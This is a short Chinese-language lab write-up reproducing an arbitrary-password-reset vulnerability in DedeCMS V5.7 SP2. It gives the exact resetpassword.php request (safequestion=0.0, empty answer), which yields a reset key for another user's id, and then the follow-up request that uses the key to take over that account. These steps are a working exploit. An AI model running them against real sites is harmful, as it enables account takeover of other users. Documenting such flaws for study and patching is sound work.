1.修改任意用户密码
首先注册两个用户,123,1234;在后台已知123的id为2,1234的id为3
登录1234,修改id为2的密码
payload:
/DedeCMS-V5.7-UTF8-SP2/uploads/member/resetpassword.php?dopost=safequestion&safequestion=0.0&safeanswer=&id=2
抓包可看到key
此时key为62dlYmGv
payload
192.168.91.141/DedeCMS-V5.7-UTF8-SP2/uploads/member/resetpassword.php?dopost=getpasswd&id=2&key=62dlYmGv
可以看到,直接跳转到了123的密码找回界面
并且登录成功
具体分析参见:这儿